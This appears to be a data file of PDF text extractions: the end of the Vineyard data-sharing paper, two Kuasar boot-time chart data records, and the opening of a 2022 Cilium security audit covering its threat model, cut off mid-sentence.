[ 49] and Spark [ 65] aim to provide\nsimple and universal APIs for diverse workloads. However, previous work [ 67] has shown that\nworkload-specific systems may outperform these general systems over 100 ×for applications like\ngraph computation. Thus, multi-system is a necessity for handling read-life complex data analytics\nworkflows.\nCross-system data sharing . Various distributed storage systems, e.g.,HDFS [ 57], S3 [ 10] and Al-\nluxio [ 40], are often applied to share immediate data in multi-system . However, they suffer from\nhuge (de)serialization and/or I/O overheads [ 11,32,60]. Thus, some recent work, e.g.,Apache Arrow\nPlasma [ 31], enables zero-copy data sharing for some data structures. However, it cannot cover\ndiverse data structures and failed to scale out to share distributed data that cannot be fit into the\nmemory of single machine.\nMulti-language interfaces . The idea of providing multiple language interfaces by generating boiler-\nplate code from a description language has been widely adopted in many projects like Protobuf\nand Thrift [ 58]. There are also attempts showing the benefits of translating LLVM bitcode to JVM\nbytecode [ 54,59]. Another research direction in polyglot programming is compiling programs in\ndifferent programming languages to the same IR and executing on the same runtime [ 62]. However,\nthe compilation barrier across languages still exists. Compared with existing work, Vineyard pro-\nposed a novel way to handle generics when generating multiple-language interfaces and made the\nintegration easier. Instead of compiling all LLVM bitcode to JVM bytecode, Vineyard only translates\ncertain instructions that can be properly handled by the JIT compiler and gains performance\nimprovement.\nData-aware scheduling . Data-intensive analytics workflows (jobs) suffer from expensive data shuffle\ncosts. Especially on Kubernetes, the scheduler routes tasks to nodes only based on the computing\nresources consideration, lacking information about data exchanging between tasks. To solve this\nproblem, some recent work, e.g.,Fluid [ 12], binds pods to nodes based on the volumes information\nthat mounts the required inputs, in order to ensure co-locating between computation and data.\nHowever, it is ill-suited for dynamic resources on multi-tenant clusters where co-locating cannot\nalways be fulfilled. Instead, Vineyard applies an adaptive switch mechanism to optimize the task\nscheduling on-the-fly to minimize the data shuffle costs.\n8 CONCLUSION\nSpecialized data processing systems targeted to specific workloads often provide high performance.\nHowever, sharing intermediate data from one to another becomes a major bottleneck. To alleviate\nhigh cross-system data-sharing costs, we present Vineyard , a high-performance, extensible, and\ncloud-native object store. With Vineyard , data sharing can be efficiently conducted via payload\nsharing and method sharing. It also provides an IDL named VCDL to facilitate the integration. As a\ncloud-native system, Vineyard is designed to be native in interacting with container orchestration\nsystems, as well as achieving fault tolerance and high performance in production environments.\nVineyard is open-source and under active development. It is already integrated or being integrated\nwith over 20 data processing systems. We hope Vineyard can be used as a common component for\ndata-intensive jobs and connect diverse big-data engines.\nProc. ACM Manag. Data, Vol. 1, No. 2, Article 200. Publication date: June 2023.Vineyard: Optimizing Data Sharing in Data-Intensive Analytics 200:25\nREFERENCES\n[1]2019. Google Analytics Customer Revenue Prediction. https://www.kaggle.com/c/ga-customer-revenue-prediction.\n[2] 2023. ioctl(2) — Linux manual page. https://man7.org/linux/man-pages/man2/ioctl.2.html.\n[3] 2023. LD_PRELOAD — Linux manual page. https://man7.org/linux/man-pages/man8/ld.so.8.html.\n[4] 2023. Data-intensive computing. https://en.wikipedia.org/wiki/Data-intensive_computing.\n[5]2023. Kubernets Scheduling Framework. https://kubernetes.io/docs/concepts/scheduling-eviction/scheduling-\nframework.\n[6] 2023. Node Property Prediction. https://ogb.stanford.edu/docs/nodeprop/.\n[7] 2023. Production-Grade Container Orchestration. https://kubernetes.io.\n[8]Martín Abadi, Ashish Agarwal, Paul Barham, Eugene Brevdo, Zhifeng Chen, Craig Citro, Greg S. Corrado, Andy\nDavis, Jeffrey Dean, Matthieu Devin, Sanjay Ghemawat, Ian Goodfellow, Andrew Harp, Geoffrey Irving, Michael Isard,\nYangqing Jia, Rafal Jozefowicz, Lukasz Kaiser, Manjunath Kudlur, Josh Levenberg, Dandelion Mané, Rajat Monga,\nSherry Moore, Derek Murray, Chris Olah, Mike Schuster, Jonathon Shlens, Benoit Steiner, Ilya Sutskever, Kunal Talwar,\nPaul Tucker, Vincent Vanhoucke, Vijay Vasudevan, Fernanda Viégas, Oriol Vinyals, Pete Warden, Martin Wattenberg,\nMartin Wicke, Yuan Yu, and Xiaoqiang Zheng. 2015. TensorFlow: Large-Scale Machine Learning on Heterogeneous\nSystems. https://www.tensorflow.org/ Software available from tensorflow.org.\n[9]Sajid Alam, Nok Lam Chan, Gabriel Comym, Yetunde Dada, Ivan Danov, Deepyaman Datta, Tynan DeBold, Jannic\nHolzer, Rashida Kanchwala, Ankita Katiyar, Amanda Koh, Andrew Mackay, Ahdra Merali, Antony Milne, Huong\nNguyen, Nero Okwa, Juan Luis Cano Rodríguez, Joel Schwarzmann, Jo Stichbury, and Merel Theisen. 2023. Kedro .\nhttps://github.com/kedro-org/kedro\n[10] Inc. Amazon Web Service. 2022. Amazon Simple Storage Service: Object Storage built to retrieve any amount of data\nfrom anywhere. https://aws.amazon.com/s3/.\n[11] Ganesh Ananthanarayanan, Ali Ghodsi, Andrew Warfield, Dhruba Borthakur, Srikanth Kandula, Scott Shenker, and\nIon Stoica. 2012. Pacman: Coordinated memory caching for parallel jobs. In 9th USENIX Symposium on Networked\nSystems Design and Implementation (NSDI 12) . 267–280.\n[12] Fluid Authors. 2021. Fluid: elastic data abstraction and acceleration for BigData/AI applications in cloud. https://fluid-\ncloudnative.github.io.\n[13] Kubernetes Authors. 2022. Kubernets Custom Resources. https://kubernetes.io/docs/concepts/extend-kubernetes/api-\nextension/custom-resources.\n[14] Kubernetes Authors. 2022. Kubernets Operator Pattern. https://kubernetes.io/docs/concepts/extend-kubernetes/opera\ntor/.\n[15] NumPy Authors. 2022. NumPy: The fundamental package for scientific computing with Python. https://www.numpy.\norg/.\n[16] Pandas authors. 2022. Pandas: Python Data Analysis Library. https://pandas.pydata.org/.\n[17] Polars Authors. 2022. Polars: Fast multi-threaded, hybrid-streaming DataFrame library. https://www.pola.rs.\n[18] SWIG Authors. 2019. SWIG: Simplified Wrapper and Interface Generator. https://github.com/swig/swig.\n[19] Inc. ClickHouse. 2022. ClickHouse: Fast Open-Source OLAP DBMS. https://clickhouse.com/.\n[20] Dormando. 2022. memcached: a distributed memory object caching system. https://memcached.org/.\n[21] Inc. Elementl. 2023. Dagster: An orchestration platform for the development, production, and observation of data\nassets. https://github.com/dagster-io/dagster.\n[22] etcd Authors. 2022. etcd: A distributed, reliable key-value store for the most critical data of a distributed system.\nhttps://etcd.io/.\n[23] Wenfei Fan, Tao He, Longbin Lai, Xue Li, Yong Li, Zhao Li, Zhengping Qian, Chao Tian, Lei Wang, Jingbo Xu, Youyang\nYao, Qiang Yin, Wenyuan Yu, Kai Zeng, Kun Zhao, Jingren Zhou, Diwen Zhu, and Rong Zhu. 2021. GraphScope: A\nUnified Engine For Big Graph Processing. Proc. VLDB Endow. 14, 12 (2021), 2879–2892.\n[24] Wenfei Fan, Wenyuan Yu, Jingbo Xu, Jingren Zhou, Xiaojian Luo, Qiang Yin, Ping Lu, Yang Cao, and Ruiqi Xu. 2018.\nParallelizing sequential graph computations. ACM Transactions on Database Systems (TODS) 43, 4 (2018), 1–39.\n[25] Yihui Feng, Zhi Liu, Yunjian Zhao, Tatiana Jin, Yidi Wu, Yang Zhang, James Cheng, Chao Li, and Tao Guan. 2021.\nScaling Large Production Clusters with Partitioned Synchronization. In 2021 USENIX Annual Technical Conference\n(USENIX ATC 21) . 81–97.\n[26] Linux Foundation. 2015. Data Plane Development Kit (DPDK). http://www.dpdk.org.\n[27] The Apache Software Foundation. 2022. Apache Airflow: A platform to programmatically author, schedule, and\nmonitor workflows. https://airflow.apache.org/.\n[28] The Apache Software Foundation. 2022. Apache Data Fusion SQL Query Engine. https://arrow.apache.org/datafusion/.\n[29] The Apache Software Foundation. 2022. Apache Doris: An easy-to-use, high-performance and unified analytical\ndatabase. https://doris.apache.org/.\nProc. ACM Manag. Data, Vol. 1, No. 2, Article 200. Publication date: June 2023.200:26 Wenyuan Yu et al.\n[30] The Apache Software Foundation. 2022. Apache Dremio: The Easy and Open Data Lakehouse. https://www.dremio.c\nom/.\n[31] The Apache Software Foundation. 2022. Arrow: A cross-language development platform for in-memory analytics.\nhttps://github.com/apache/arrow.\n[32] Sanjay Ghemawat, Howard Gobioff, and Shun-Tak Leung. 2003. The Google file system. In Proceedings of the nineteenth\nACM symposium on Operating systems principles . 29–43.\n[33] Ionel Gog, Malte Schwarzkopf, Natacha Crooks, Matthew P Grosvenor, Allen Clement, and Steven Hand. 2015.\nMusketeer: all for one, one for all in data processing systems. In Proceedings of the Tenth European Conference on\nComputer Systems . 1–16.\n[34] Joseph E Gonzalez, Yucheng Low, Haijie Gu, Danny Bickson, and Carlos Guestrin. 2012. Powergraph: Distributed graph-\nparallel computation on natural graphs. In 10th USENIX Symposium on Operating Systems Design and Implementation\n(OSDI 12) . 17–30.\n[35] Inc. Google. 2022. Protocol Buffers: A language-neutral, platform-neutral extensible mechanism for serializing\nstructured data. https://developers.google.com/protocol-buffers.\n[36] Robert Grandl, Arjun Singhvi, Raajay Viswanathan, and Aditya Akella. 2021. Whiz: Data-Driven Analytics Execution.\nIn18th USENIX Symposium on Networked Systems Design and Implementation (NSDI 21) .\n[37] gRPC Authors. 2022. gRPC: A high performance, open source universal RPC framework. https://grpc.io.\n[38] Weihua Hu, Matthias Fey, Hongyu Ren, Maho Nakata, Yuxiao Dong, and Jure Leskovec. 2021. Ogb-lsc: A large-scale\nchallenge for machine learning on graphs. arXiv preprint arXiv:2103.09430 (2021).\n[39] Inc. Juicedata. 2022. JuiceFS: A POSIX, HDFS and S3 compatible distributed file system for cloud. https://juicefs.com/en/.\n[40] Haoyuan Li, Ali Ghodsi, Matei Zaharia, Scott Shenker, and Ion Stoica. 2014. Tachyon: Reliable, memory speed storage\nfor cluster computing frameworks. In Proceedings of the ACM Symposium on Cloud Computing . 1–15.\n[41] Jingdong Li, Zhao Li, Jiaming Huang, Ji Zhang, Xiaoling Wang, Xingjian Lu, and Jingren Zhou. 2021. Large-scale Fake\nClick Detection for E-commerce Recommendation Systems. In ICDE .\n[42] libclang Authors. 2022. libclang: C interface to Clang. https://clang.llvm.org/doxygen/group__CINDEX.html.\n[43] libfuse authors. 2022. libfuse: The reference implementation of the Linux FUSE (Filesystem in Userspace) interface.\nhttps://github.com/libfuse/libfuse.\n[44] Redis Ltd. 2022. Redis: The open source, in-memory data store. https://redis.io/.\n[45] The Alibaba Group Holding Ltd. 2022. Mars: a tensor-based unified framework for large-scale data computation.\nhttps://github.com/mars-project/mars.\n[46] Ruotian Luo. 2017. An Image Captioning codebase in PyTorch. https://github.com/ruotianluo/ImageCaptioning.pytorc\nh.\n[47] Frank McSherry, Michael Isard, and Derek G Murray. 2015. Scalability! But at what COST?. In 15th Workshop on Hot\nTopics in Operating Systems (HotOS XV ) .\n[48] Anthony M Middleton. 2010. Data-intensive technologies for cloud computing. In Handbook of cloud computing .\nSpringer, 83–136.\n[49] Philipp Moritz, Robert Nishihara, Stephanie Wang, Alexey Tumanov, Richard Liaw, Eric Liang, Melih Elibol, Zongheng\nYang, William Paul, Michael I Jordan, et al .2018. Ray: A distributed framework for emerging AI applications. In 13th\nUSENIX Symposium on Operating Systems Design and Implementation (OSDI 18) . 561–577.\n[50] Vu Nguyen, Sophia Deeds-Rubin, Thomas Tan, and Barry Boehm. 2007. A SLOC counting standard. In Cocomo ii\nforum , Vol. 2007. Citeseer, 1–16.\n[51] Shoumik Palkar and Matei Zaharia. 2019. Optimizing Data-Intensive Computations in Existing Libraries with Split\nAnnotations. In Proceedings of the 27th ACM Symposium on Operating Systems Principles (Huntsville, Ontario, Canada)\n(SOSP ’19) . Association for Computing Machinery, New York, NY, USA, 291–305. https://doi.org/10.1145/3341301.3359\n652\n[52] Adam Paszke, Sam Gross, Francisco Massa, Adam Lerer, James Bradbury, Gregory Chanan, Trevor Killeen, Zeming\nLin, Natalia Gimelshein, Luca Antiga, Alban Desmaison, Andreas Kopf, Edward Yang, Zachary DeVito, Martin Raison,\nAlykhan Tejani, Sasank Chilamkurthy, Benoit Steiner, Lu Fang, Junjie Bai, and Soumith Chintala. 2019. PyTorch: An\nImperative Style, High-Performance Deep Learning Library. In Advances in Neural Information Processing Systems\n32. Curran Associates, Inc., 8024–8035. http://papers.neurips.cc/paper/9015-pytorch-an-imperative-style-high-\nperformance-deep-learning-library.pdf\n[53] Zhengping Qian, Chenqiang Min, Longbin Lai, Yong Fang, Gaofeng Li, Youyang Yao, Bingqing Lyu, Xiaoli Zhou,\nZhimin Chen, and Jingren Zhou. 2021. GAIA: A System for Interactive Analysis on Distributed Graphs Using a\nHigh-Level Language. In 18th USENIX Symposium on Networked Systems Design and Implementation (NSDI 21) .\n[54] Manuel Rigger, Matthias Grimmer, and Hanspeter Mössenböck. 2016. Sulong - Execution of LLVM-Based Languages\non the JVM: Position Paper. In Proceedings of the 11th Workshop on Implementation, Compilation, Optimization of\nObject-Oriented Languages, Programs and Systems (Rome, Italy) (ICOOOLPS ’16) . Association for Computing Machinery,\nProc. ACM Manag. Data, Vol. 1, No. 2, Article 200. Publication date: June 2023.Vineyard: Optimizing Data Sharing in Data-Intensive Analytics 200:27\nNew York, NY, USA, Article 7, 4 pages. https://doi.org/10.1145/3012408.3012416\n[55] scikit-learn Authors. 2022. scikit-learn: Machine-Learning in Python. https://scikit-learn.org/.\n[56] Raghav Sethi, Martin Traverso, Dain Sundstrom, David Phillips, Wenlei Xie, Yutian Sun, Nezih Yegitbasi, Haozhun Jin,\nEric Hwang, Nileema Shingte, and Christopher Berner. 2019. Presto: SQL on Everything. In 2019 IEEE 35th International\nConference on Data Engineering (ICDE) . 1802–1813. https://doi.org/10.1109/ICDE.2019.00196\n[57] Konstantin Shvachko, Hairong Kuang, Sanjay Radia, and Robert Chansler. 2010. The hadoop distributed file system. In\n2010 IEEE 26th symposium on mass storage systems and technologies (MSST) . Ieee, 1–10.\n[58] Mark Slee, Aditya Agarwal, and Marc Kwiatkowski. 2007. Thrift: Scalable cross-language services implementation.\nFacebook white paper 5, 8 (2007), 127.\n[59] Levon Stepanian, Angela Demke Brown, Allan Kielstra, Gita Koblents, and Kevin Stoodley. 2005. Inlining Java Native\nCalls at Runtime. In Proceedings of the 1st ACM/USENIX International Conference on Virtual Execution Environments\n(Chicago, IL, USA) (VEE ’05) . Association for Computing Machinery, New York, NY, USA, 121–131. https://doi.org/10\n.1145/1064979.1064997\n[60] Ashish Thusoo, Joydeep Sen Sarma, Namit Jain, Zheng Shao, Prasad Chakka, Ning Zhang, Suresh Antony, Hao Liu,\nand Raghotham Murthy. 2010. Hive-a petabyte scale data warehouse using hadoop. In 2010 IEEE 26th international\nconference on data engineering (ICDE 2010) . IEEE, 996–1005.\n[61] Hongwei Wang, Fuzheng Zhang, Miao Zhao, Wenjie Li, Xing Xie, and Minyi Guo. 2019. Multi-task feature learning for\nknowledge graph enhanced recommendation. In The World Wide Web Conference . 2000–2010.\n[62] Thomas Würthinger, Christian Wimmer, Andreas Wöß, Lukas Stadler, Gilles Duboscq, Christian Humer, Gregor\nRichards, Doug Simon, and Mario Wolczko. 2013. One VM to Rule Them All. In Proceedings of the 2013 ACM\nInternational Symposium on New Ideas, New Paradigms, and Reflections on Programming & Software (Indianapolis,\nIndiana, USA) (Onward! 2013) . Association for Computing Machinery, New York, NY, USA, 187–204. https://doi.org/\n10.1145/2509578.2509581\n[63] Matei Zaharia, Mosharaf Chowdhury, Tathagata Das, Ankur Dave, Justin Ma, Murphy McCauly, Michael J Franklin,\nScott Shenker, and Ion Stoica. 2012. Resilient distributed datasets: A fault-tolerant abstraction for in-memory cluster\ncomputing. In 9th USENIX Symposium on Networked Systems Design and Implementation (NSDI 12) . 15–28.\n[64] Matei Zaharia, Reynold S Xin, Patrick Wendell, Tathagata Das, Michael Armbrust, Ankur Dave, Xiangrui Meng, Josh\nRosen, Shivaram Venkataraman, Michael J Franklin, et al .2016. Apache spark: a unified engine for big data processing.\nCommun. ACM 59, 11 (2016), 56–65.\n[65] Matei Zaharia, Reynold S. Xin, Patrick Wendell, Tathagata Das, Michael Armbrust, Ankur Dave, Xiangrui Meng,\nJosh Rosen, Shivaram Venkataraman, Michael J. Franklin, Ali Ghodsi, Joseph Gonzalez, Scott Shenker, and Ion\nStoica. 2016. Apache Spark: A Unified Engine for Big Data Processing. Commun. ACM 59, 11 (Oct. 2016), 56–65.\nhttps://doi.org/10.1145/2934664\n[66] Rong Zhu, Kun Zhao, Hongxia Yang, Wei Lin, Chang Zhou, Baole Ai, Yong Li, and Jingren Zhou. 2019. AliGraph: a\ncomprehensive graph neural network platform. Proceedings of the VLDB Endowment 12, 12 (2019), 2094–2105.\n[67] Xiaowei Zhu, Wenguang Chen, Weimin Zheng, and Xiaosong Ma. 2016. Gemini: A computation-centric distributed\ngraph processing system. In 12th USENIX Symposium on Operating Systems Design and Implementation (OSDI 16) .\n301–316.\n[68] Xiaowei Zhu, Guanyu Feng, Marco Serafini, Xiaosong Ma, Jiping Yu, Lei Xie, Ashraf Aboulnaga, and Wenguang Chen.\n2020. LiveGraph: A Transactional Graph Storage System with Purely Sequential Adjacency List Scans. Proc. VLDB\nEndow. 13, 7 (mar 2020), 1020–1034. https://doi.org/10.14778/3384345.3384351\nReceived November 2022; revised February 2023; accepted March 2023\nProc. ACM Manag. Data, Vol. 1, No. 2, Article 200. Publication date: June 2023." } ]
{ "category": "Runtime", "file_name": "boot-parallel-50-time.pdf", "project_name": "Kuasar", "subcategory": "Container Runtime" }
[ { "data": " 0 0.2 0.4 0.6 0.8 1\n 0 200 400 600 800 1000 1200 1400 1600 1800 2000CDF\nParallel boot time (ms)Kata\nKuasar" } ]
{ "category": "Runtime", "file_name": "boot-serial-1000-time.pdf", "project_name": "Kuasar", "subcategory": "Container Runtime" }
[ { "data": " 0 0.2 0.4 0.6 0.8 1\n 0 200 400 600 800 1000 1200CDF\nSerial boot time (ms)Kata\nKuasar" } ]
{ "category": "Runtime", "file_name": "CiliumSecurityAudit2022.pdf", "project_name": "Cilium", "subcategory": "Cloud Native Network" }
[ { "data": "P R E S E N T S \nC i l i u m s e c u r i t y a u d i t\nIn collaboration with the Cilium maintainers, Open Source Technology Improvement Fund and The\nLinux Foundation\nA u t h o r s\nAdam Korczynski <\nadam@adalogics.com\n>\nDavid Korczynski <\ndavid@adalogics.com\n>\nDate: 13th February, 2023\nThis report is licensed under Creative Commons 4.0 (CC BY 4.0)\nCilium security audit, 2022\nT able of contents\nTable of contents\n2\nExecutive summary\n3\nProject Summary\n4\nAudit Scope\n4\nThreat model formalisation\n5\nFuzzing\n1\n2\nSupply chain\n1\n5\nIssues\n1\n8\n2Cilium security audit, 2022\nEx ecutive summary\nIn November and December 2022, Ada Logics carried out a security audit of Cilium on behalf of the\nCloud Native Computing Foundation and the Open Source Technology Improvement Fund. The\ngoal was to undertake a holistic security audit to draw on several security disciplines and evaluate\nand improve the security of Cilium.\nEngagement objectives\nThe audit had the following high-level objectives:\n1.\nThreat model formalisation\n: This part assessed the\ncritical components of Cilium along\nwith threat scenarios and architectural considerations relevant for Ciliums security posture.\n2.\nManual code audit\n: In this part, the auditing team\nmanually audited the Cilium code base.\n3.\nImprove OSS-Fuzz fuzzing suite\n: Cilium already had\na decent fuzz test suite in place, and\nin this part the auditing team assessed the test coverage for possible improvements.\n4.\nSLSA review\n: The audit team carried out a SLSA review\nto assess the compliance level of\nCilium.\nProcess\nAda Logics commenced the engagement with an initial assessment of the Cilium project evaluating\ndocumentation, source code, previous vulnerabilities, maintainer and community responses to\ncode issues and more. The purpose of this part was to get an initial understanding of how to\naddress the hands-on part of the audit.\nNext, Ada Logics dra\u0000ed the threat model and began the fuzzing as well as manual auditing\nprocess. The threat model evolved in parallel with the fuzzing and manual work. Fuzzers were\ncommitted upstream ad-hoc and added to Ciliums OSS-Fuzz integration. Security concerns\nidentified in the manual audit were shared with the Cilium team over two occasions: Once half-way\nthrough the audit and once at the end of the audit.\nFinally, Ada Logics dra\u0000ed the report detailing the overall engagement and shared this with the\nCilium team. Together, the teams refined the report for publication.\nResults and conclusions\nIn total 13 fuzzers were added to the test suite 3 of which were written for a critical 3rd-party\ndependency to Cilium. An OSS-Fuzz integration was also set up for this dependency. 22 security\nconcerns were identified during the manual auditing.\nThe overall conclusion is that Cilium is a well-secured project. The audit found no critical or high\nseverity vulnerabilities and found a lot of positives about the security of Cilium. This included both\nthe code displaying positive security awareness as well as the maintainers having thorough\nunderstanding about the security posture of Cilium.\n3Cilium security audit, 2022\nProject Summary\nThe auditors of Ada Logics were:\nName\nTitle\nEmail\nAdam Korczynski\nSecurity Engineer, Ada Logics\nAdam@adalogics.com\nDavid Korczynski\nSecurity Researcher, Ada Logics\nDavid@adalogics.com\nThe Cilium community members that were involved were:\nName\nTitle\nEmail\nJoe Stringer\nSo\u0000ware Engineer, Isovalent\njoe@isovalent.com\nLiz Rice\nChief Open Source Officer, Isovalent\nliz@isovalent.com\nMathieu Payeur Levallois\nDirector of Engineering, Isovalent\nmpl@isovalent.com\nDavid Bimmler\nSo\u0000ware Engineer, Isovalent\ndavid.bimmler@isovalent.com\nMartynas Pumputis\nSo\u0000ware Engineer, Isovalent\nmartynas@isovalent.com\nNate Sweet\nSo\u0000ware Engineer, Isovalent\nnathan.sweet@isovalent.com\nAlexandre Perrin\nSo\u0000ware Engineer, Isovalent\nalex.perrin@isovalent.com\nMohit Marathe\nStudent, IIT (BHU)\nmohitmarathe23@gmail.com\nThe following facilitators of OSTIF were engaged in the audit:\nName\nTitle\nEmail\nDerek Zimmer\nExecutive Director, OSTIF\nDerek@ostif.org\nAmir Montazery\nManaging Director, OSTIF\nAmir@ostif.org\nAudit Scope\nThe following assets were in scope of the audit.\nCilium\nRepository\nhttps://github.com/cilium/cilium\nLanguage\nGo, C\n4Cilium security audit, 2022\nThreat model formalisation\nIn this section we outline the threat model of Cilium. We first outline the core components of\nCiliumʼs architecture. Next, we specify the threat actors that could have a harmful impact on a\nCilium deployment. Finally we exemplify several threat scenarios based on the observations made\nin the architecture overview and the specified threat actors.\nThe threat modelling has been conducted based on the following public resources:\n●\nCiliumʼs documentation including README files from Ciliums repository.\n●\nCiliumʼs source code at\nhttps://github.com/cilium/cilium\n.\n●\n3rd-party literature, documentation and media.\n●\nFeedback from Cilium maintainers\nThe intended audience for the threat model is the three target groups:\n1.\nSecurity researchers who wish to contribute to the security posture of Cilium.\n2.\nMaintainers of Cilium.\n3.\nUsers of Cilium.\nIt is expected that the threat model evolves over time based on both how Cilium and adoption\nevolves. As such, threat modelling should be seen as an ongoing effort. Future security disclosures\nto the Cilium security team are opportunities to evaluate the threat model of the affected\ncomponents and use cases of the reported disclosure.\n5Cilium security audit, 2022\nCilium architecture\nDaemon\nThe Cilium daemon runs on each node in the cluster and interacts with the container runtime and\nKubernetes via plugins to set up networking and security policies. At a high-level, it accepts\nconfiguration via Kubernetes or APIs that describe networking, service load-balancing, network\npolicies, and visibility & monitoring requirements.\nThe daemon listens for events from orchestration systems such as Kubernetes to learn when\ncontainers or workloads are started and stopped. It manages/creates the eBPF programs which the\nLinux kernel uses to control all network access in / out of those containers.\nSource files\n●\nhttps://github.com/cilium/cilium/tree/master/daemon\nPolicy repository\nThe policy repository has a list of policy rules that collectively make up a security policy. It is\ncreated by the Daemon when the core policy components are initialised. The Daemon is the only\ncomponent that interacts with the policy repository. Some actions performed by the Daemon\nagainst the policy repository are:\n●\nAdding new policy rules\n●\nDeleting policy rules\nCNI Plugin\n6\nCilium security audit, 2022\nCilium interacts with Kubernetes via Kubernetesʼ Container Network Interface. Kubernetes starts\nCiliums CNI Plugin when a pod gets scheduled or stopped on a node.\nMost logic of the CNI plugin is in its\nmain.go\n, where\nthe\nADD\n,\nCHECK\n,\nDEL\ncommands are\nimplemented.\nSource files:\n●\nhttps://github.com/cilium/cilium/tree/master/plugins/cilium-cni\neBPF Datapath\nOne of the central innovations in Cilium is the use of eBPF programs to observe and filter events in\nthe kernel. This is achieved by having eBPF programs attached to hook points, including within the\neXpress Data Path and in the traffic control subsystem. Specifically, the hooks applied by eBPF can\nbe summarised as follows:\n1.\nXDP\n: An early XDP BPF hook that is triggered at the\nearliest possible point in the network\ndriver. The program runs when a packet is received.\n2.\nTraffic control (tc)\n: The next eBPF program is invoked\na few steps a\u0000er the networking\nstack has carried out initial processing of the packet. At this stage, Cilium has access to the\nsk_buff (socket buffer).\n3.\nSocket hooks\n: When the packet reaches Layer 4, Cilium\nhas eBPF programs that attach to a\ncgroup and run on TCP events. “The socket send/recv hook runs on every send operation\nperformed by a TCP socket. At this point the hook can inspect the message and either drop\nthe message, send the message to the TCP layer, or redirect the message to another socket.\nCilium uses this to accelerate the datapath redirects as described below.”\n1\nThe eBPF programs are run at the kernel level and, therefore, operate at a privileged level of the\nsystem where access could theoretically impact the integrity of the system. However, eBPF\nprograms are written in a subset of the C programming language that helps reduce the complexity\nof the programs, e.g. by disallowing unbounded loops to avoid deadlocks, and the impact of this is\nthat the programs become more simple to analyse. The subset of C does not itself guarantee\nmemory safety of the programs, however, to ensure further safety and guard against potential\nissues, the eBPF programs must be accepted by the eBPF verifier before being loaded into the\nkernel [\nhttps://docs.kernel.org/bpf/verifier.html\n].\n1\nhttps://docs.cilium.io/en/stable/concepts/ebpf/intro/#:~:text=The%20socket%20send,as%20described%20b \nelow\n.\n7Cilium security audit, 2022\nThreat actor enumeration\nIn this section we define the threat actors that we considered throughout the audit. These actors\nare defined pro-actively from studying the architecture of Cilium, and also by using a bottom-up\napproach based on findings in the Cilium code. Buttom-up in this context means when a coding\nissue is found we reason about what type of potential attacker can leverage such an issue.\nThreat actors is a classification of a person or group of people that could actively seek to negatively\nimpact Ciliums security posture and/or use flaws in Ciliums security posture to negatively impact\nusers of Cilium. In an attack scenario, a threat actor answers the question: “Who would carry out\nthis attack?”.\nActor\nDescription\nCilium contributor\nCilium is an open-source project that accepts contributions from the\ncommunity. Contributors can intentionally or unintentionally\ncommit vulnerable code to Cilium.\nCilium maintainer\nA person that maintains the public Cilium code repository and is \nconsidered a gatekeeper for additions to the project.\n3rd-party dependency \ncontributors\nCilium uses open-source dependencies, many of which accept \ncontributions from the community. A 3rd-party dependency \ncontributor is a person who contributes code to projects in Ciliums \ndependency tree.\n3rd-party dependency \nmaintainer\nA 3rd-party dependency maintainer is a person that manages public \ncode repositories that Cilium depends on.\nInternal user with limited \nprivileges\nAn actor that has access to a host that runs Cilium, but who has \nlower privileges than Cilium itself.\nInternal attacker\nAn actor that has escaped a container on a host running Cilium.\nExternal attacker\nExternal attacker on the internet.\nCilium administrators\nCilium administrators manage the Cilium clusters.\n8Cilium security audit, 2022\nThreat surface enumeration\nIn this section we iterate through the threat surface that we considered when auditing the code.\nThis was created iteratively as the audit progressed and the more we learned about the Cilium\ncodebase.\nPolicy enforcement bugs\nCiliumʼs policy model must be robust, secure and consistent. Users should be able to specify\npolicies that Cilium follows. Implementation errors in the policy enforcement code can lead to\nissues, e.g. policies are assumed to block something they do not block. In this context we are\nreferring to implementation issues in Cilium and not issues written in the policies themselves (for\nwhich there are suitable tools for learning and cra\u0000ing policies\nhttps://networkpolicy.io\n). Users\nshould be able to expect their policies to be enforced correctly by Cilium, however, implementation\nerrors may allow an attacker to circumvent an ill-enforced policy. There are two examples of this in\npast advisorised\nhttps://github.com/cilium/cilium/security/advisories/GHSA-wc5v-r48v-g4vh\nand\nhttps://github.com/cilium/cilium/security/advisories/GHSA-c66w-hq56-4q97\nIssues in the eBPF code\nThe eBPF programs of Cilium are susceptible to logical issues (note, we found no such issues in the\nactual auditing). This includes any filtering that they may promise from a logical perspective but do\nnot successfully enforce. For example, in the event the user specifies certain policies then these\npolicies must be accurately handled by the eBPF programs.\nThe Linux kernel eBPF verifier performs an exhaustive analysis of the eBPF programs, including\nanalysis of all possible execution paths, range analysis and more, which together ensure the safety\nof a given eBPF program. The verifier has been under thorough analysis, such as academic research\nfocusing on formal verification of its range analysis\n[\nhttps://sanjit-bhat.github.io/assets/pdf/ebpf-verifier-range-analysis22.pdf\n].\nThe consequence of\nthis is that the eBPF programs come with a high standard of security by default with respect to\nmemory corruption issues. For these reasons and due to timing constraints, in this audit we do not\ninspect the eBPF programs for possible memory corruption issues as problems in this context\nshould be caught by the verifier.\nIn general, the security of Ciliumʼs eBPF programs are dependent on the eBPF verifier as well as the\neBPF compiler toolchain. The verifier itself is complex and not limited to the same subset as eBPF\nprograms, and has previously had issues e.g. CVE-2020-8835. Therefore, limitations in the eBPF\nverifier or eBPF compiler toolchain can impact the integrity of the kernel when used with so\u0000ware\nsuch as Cilium.\nImportantly in this context is that\na\u0000er Cilium runs on the node, the node cannot run\nunprivileged eBPF programs because Cilium disables this ability for the rest of the kernel run time\n(using\nsysctl kernel.unprivileged_bpf_disabled=1)\n.\nThis is done in Cilium in order to prevent the\nclass of verifier vulnerabilities like CVE-2020-8835. This is also described here:\nhttps://docs.cilium.io/en/stable/bpf/#hardening\n.\nKvstore\n9Cilium security audit, 2022\nCilium can share data about cluster-wide state with all Cilium agents in two ways: in CRDʼs or in a\nglobal key-value store. The two production-grade key-value stores supported are etcd and Consul,\nwith etcd being the most widely used. Cilium agents connect to the key-value store and obtain the\ndata in the kv-store to effectuate the desired state across pods:\nIf Cilium is deployed in kv-store mode, the Cilium etcd/Consul endpoints represent an attack\nsurface for the cluster which an attacker with local network access could attempt to exploit. If an\nattacker was able to compromise the kv-store instance to a degree where they could modify the\nentries of the store, they would de-facto have full control of the cluster.\nThis attack surface exists even if Cilium is not deployed in kv-store mode, in that Kubernetes per\ndefault uses etcd. As such, Ciliumʼs kv-store mode does not expose increased attack surface but\ndepends on Kubernetesʼ threat model for Cilium-specific configuration data.\nProper configuration by the Cilium user of the kv-store is critical in preventing exploitation of the\nadded attack surface from the kv-store.\nDepending on the configuration of the cluster, an attacker could utilize other properties of the\nkv-store deployment. If the kv-store runs in a container with root privileges, the attacker has a\nhigher chance of 